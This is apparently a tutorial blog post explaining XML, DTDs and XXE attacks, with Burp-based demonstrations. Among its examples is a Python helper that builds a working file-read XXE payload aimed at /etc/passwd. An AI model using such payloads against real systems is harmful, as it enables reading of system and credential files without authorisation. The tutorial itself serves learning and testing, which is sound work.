XML External Entity (XXE) attack
A Comprehensive Guide to XXE Attacks and Exploitation
Hello folks, welcome to my blog! Today’s topic is the XXE attack. An XML External Entity (XXE) attack takes advantage of how XML parsers handle external entities in the data they are given. It lets attackers abuse the application to reach backend systems or external resources: they can read files on the system, cause a Denial of Service (DoS), or trick the application into making requests to other systems. In some setups, XXE can even allow port scanning and remote code execution.
There are two main types of XXE attacks:
1) In-band XXE attack: Here, the attacker receives an immediate response to their XXE payload.
2) Out-of-band (OOB-XXE) attack: Also known as blind XXE. Here the application gives no immediate response, so the attacker needs to find a way to send the output of their XXE payload to another file or to their own server.
Before we move on to XXE exploitation, we’ll have to understand XML properly.
What is XML?
XML (eXtensible Markup Language) is a versatile markup language used for encoding documents in a readable format for both humans and machines. It’s widely employed for storing and transporting data due to its flexibility and platform-independence.
Why do we use XML?
1. Platform and Language Independence: XML is plain text, so it can be written and read on any system and in any programming language, and it keeps working as the technology around it changes.
2. Data Flexibility: XML keeps data separate from presentation, so the data can be modified without affecting how it is displayed.
3. Validation Support: XML supports validation using DTD (Document Type Definition) and Schema, so a document’s structure can be checked against agreed rules.
4. Interoperability: Sharing data across different systems is simplified as XML doesn’t require conversion during transfer.
Syntax
XML Prolog: An optional line specifying the XML version and encoding used
<?xml version="1.0" encoding="UTF-8"?>
The line above is called the XML prolog. It specifies the XML version and the encoding used in the XML document. This line is not compulsory, but it is considered `good practice` to put it in all your XML documents.
Every XML document must contain exactly one `ROOT` element. For example:
<?xml version="1.0" encoding="UTF-8"?>
<mail>
<to>falcon</to>
<from>feast</from>
<subject>About XXE</subject>
<text>Teach about XXE</text>
</mail>
In the above example, `<mail>` is the ROOT element of the document and `<to>`, `<from>`, `<subject>`, `<text>` are its child elements. If an XML document doesn't have a root element, it is considered a wrong or invalid XML doc (strictly speaking, it is not well-formed).
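To make the root/children idea concrete, here is a small sketch that parses the `<mail>` document with Python's standard `xml.etree.ElementTree` module. The helper name `describe` is my own and only there for illustration.

```python
import xml.etree.ElementTree as ET

# The <mail> document from above. The prolog has to be the very first
# thing in the data, so the literal starts right at "<?xml".
MAIL_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<mail>
<to>falcon</to>
<from>feast</from>
<subject>About XXE</subject>
<text>Teach about XXE</text>
</mail>"""

def describe(xml_bytes):
    """Return the root tag and a list of (child tag, child text) pairs."""
    root = ET.fromstring(xml_bytes)
    return root.tag, [(child.tag, child.text) for child in root]

root_tag, children = describe(MAIL_XML)
print("root:", root_tag)
for tag, text in children:
    print("child:", tag, "=", text)
```

The parser hands back a single root element, and everything else hangs off it as children.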
Another thing to remember is that XML is a case sensitive language. If a tag starts like `<to>` then it has to end with `</to>` and not with something like `</To>` (notice the capitalization of `T`).
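A quick way to see the case sensitivity rule is to hand both variants to a parser. This is a minimal sketch using Python's standard `xml.etree.ElementTree`; the helper name `parses` is hypothetical.

```python
import xml.etree.ElementTree as ET

def parses(xml_text):
    """Return True if the parser accepts the text, False if it raises ParseError."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False

print(parses("<to>falcon</to>"))  # opening and closing tag match
print(parses("<to>falcon</To>"))  # closing tag differs only in case
```

The second call fails because the parser treats `to` and `To` as two different element names.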
Like HTML, we can use attributes in XML too. The syntax for attributes is also very similar to HTML. For example:
<text category = "message">You need to learn about XXE</text>
In the above example, `category` is the attribute name and `message` is the attribute value.
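Reading that attribute back from code might look like the sketch below, again assuming Python's standard `xml.etree.ElementTree` as the parser.

```python
import xml.etree.ElementTree as ET

# Same element as above; the spaces around "=" are allowed in XML.
element = ET.fromstring('<text category = "message">You need to learn about XXE</text>')

print(element.attrib)           # all attributes as a dict
print(element.get("category"))  # a single attribute value
print(element.text)             # the element's text content
```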
Now, don’t be confused by DTD. Before we start learning about XXE, we’ll have to understand what a DTD is in XML.
DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document.
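Let us try to understand this with the help of an example. Say we have a file named `note.dtd` with the following content:
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
An external DTD file like this holds only the declarations. The `<!DOCTYPE note [ ... ]>` wrapper is used when the same declarations are written inside the XML document itself.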
Now we can use this DTD to validate the information of some XML document and make sure that the XML file conforms to the rules of that DTD.
Example: below is an XML document that uses `note.dtd`:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>falcon</to>
<from>feast</from>
<heading>hacking</heading>
<body>XXE attack</body>
</note>
So now let’s understand how that DTD validates the XML. Here’s what the declarations mean:
- `!DOCTYPE note`: declares that the root element of the document is `note`
- `!ELEMENT note`: defines that the `note` element must contain the elements `to`, `from`, `heading`, `body`, in that order
- `!ELEMENT to`: defines the `to` element to be of type `#PCDATA`
- `!ELEMENT from`: defines the `from` element to be of type `#PCDATA`
- `!ELEMENT heading`: defines the `heading` element to be of type `#PCDATA`
- `!ELEMENT body`: defines the `body` element to be of type `#PCDATA`
NOTE: `#PCDATA` means parsed character data, i.e. plain text that the parser still scans for markup and entity references.
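To get a feel for what those rules enforce, here is a rough sketch in Python. As far as I know the standard library parser does not validate against a DTD, so this is a hand-written stand-in that checks the same three things for the `note` example only. It is not real DTD validation, and `follows_note_rules` is a made-up name.

```python
import xml.etree.ElementTree as ET

# Child order required by <!ELEMENT note (to,from,heading,body)>.
REQUIRED_CHILDREN = ["to", "from", "heading", "body"]

def follows_note_rules(xml_text):
    """Hand-rolled stand-in for validating a document against the note DTD."""
    root = ET.fromstring(xml_text)
    # Rule 1: the root element must be <note>.
    if root.tag != "note":
        return False
    # Rule 2: exactly these children, in exactly this order.
    if [child.tag for child in root] != REQUIRED_CHILDREN:
        return False
    # Rule 3: (#PCDATA) children hold text only, no nested elements.
    return all(len(child) == 0 for child in root)

# The DOCTYPE line is left out here because nothing in this sketch loads note.dtd.
good = "<note><to>falcon</to><from>feast</from><heading>hacking</heading><body>XXE attack</body></note>"
bad = "<note><to>falcon</to><from>feast</from><body>XXE attack</body></note>"  # no <heading>

print(follows_note_rules(good))
print(follows_note_rules(bad))
```

A validating parser does this kind of check for you, driven by the DTD instead of hard-coded rules.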
Now let’s look at some XXE payloads and see how they work.
1) The first payload is very simple. If you’ve read the previous section properly, you’ll understand this payload very easily.
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
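As we can see, we are defining an ENTITY called `name` and assigning it the value `feast`. Later, we use that ENTITY in the document as `&name;`, and the parser replaces it with `feast`. Nothing external is involved yet; this only shows how entity substitution works.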
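The substitution can be observed directly by parsing this first payload. The sketch below uses Python's standard `xml.etree.ElementTree`, which expands entities declared inside the document itself.

```python
import xml.etree.ElementTree as ET

# The first payload: an internal entity called "name" with the value "feast".
PAYLOAD = """<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>"""

root = ET.fromstring(PAYLOAD)
first_name = root.find("firstName").text
last_name = root.find("lastName").text  # &name; has been replaced by the parser

print(first_name, last_name)
```

By the time the application reads `lastName`, the `&name;` reference is already gone and only the entity's value is left.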
2) We can also use XXE to read a file from the system by defining an ENTITY that uses the `SYSTEM` keyword.
The payload itself could not be included here: the blogging platform refuses to publish the post with this code in it, so try writing it out yourself.
Here again, we are defining an ENTITY, this time with the name `read`, but the difference is that we set its value to `SYSTEM` followed by the path of the file. If we use this payload, a website vulnerable to XXE would (normally) display the content of the file `/etc/passwd`.
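In a similar manner, we can use this kind of payload to read other files. It often fails, though, and the reason can be the file you are trying to read: for example, the application may not have permission to read it, or its content may contain characters such as `<` or `&` that break the XML once the parser substitutes it in.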
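Since the listing for this payload is not shown in the post, here is a sketch of what such a payload commonly looks like, built from the description above: an entity called `read` that uses `SYSTEM` and a `file://` path. The surrounding `userInfo` structure is borrowed from the first payload and is my assumption, as are the helper names `build_file_read_payload` and `stdlib_accepts`. The second helper shows that Python's standard `xml.etree.ElementTree` does not resolve external entities and rejects the document instead, which is the opposite of what a vulnerable parser does.

```python
import xml.etree.ElementTree as ET

def build_file_read_payload(path):
    """Hypothetical helper: XXE payload whose entity `read` points at `path`."""
    return (
        f'<!DOCTYPE replace [<!ENTITY read SYSTEM "file://{path}"> ]>\n'
        "<userInfo>\n"
        "<firstName>falcon</firstName>\n"
        "<lastName>&read;</lastName>\n"
        "</userInfo>"
    )

def stdlib_accepts(payload):
    """Return True if ElementTree parses the payload, False if it raises ParseError."""
    try:
        ET.fromstring(payload)
        return True
    except ET.ParseError:
        return False

payload = build_file_read_payload("/etc/passwd")
print(payload)
print("accepted by ElementTree:", stdlib_accepts(payload))
```

A parser configured to load external entities would replace `&read;` with the file's content, and that is how the content ends up in the application's response.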
Now let us see some payloads in action. The payloads that I’ll be using are the ones we saw in the previous section.
1) Let’s see how the website looks when we use the payload for displaying the name.
On the left side, we can see the Burp request that was sent with the URL-encoded payload, and on the right side we can see that the payload successfully displayed the name falcon feast.
2) Now let’s try to read `/etc/passwd`.
That’s all for today, and see you in the next post.
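The requests in this walkthrough carry the payload URL-encoded. If you want to prepare that encoding outside of Burp, a minimal sketch with Python's standard `urllib.parse` could look like this. How the target application expects the payload to arrive (which parameter, which content type) is not covered here and depends on the site.

```python
from urllib.parse import quote, unquote

# The name-displaying payload from earlier, on one line.
PAYLOAD = (
    '<!DOCTYPE replace [<!ENTITY name "feast"> ]>'
    "<userInfo><firstName>falcon</firstName><lastName>&name;</lastName></userInfo>"
)

# safe="" makes quote() percent-encode every reserved character, including "/".
encoded = quote(PAYLOAD, safe="")
print(encoded)

# Decoding gives the original payload back unchanged.
decoded = unquote(encoded)
print(decoded == PAYLOAD)
```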
keep the bytes…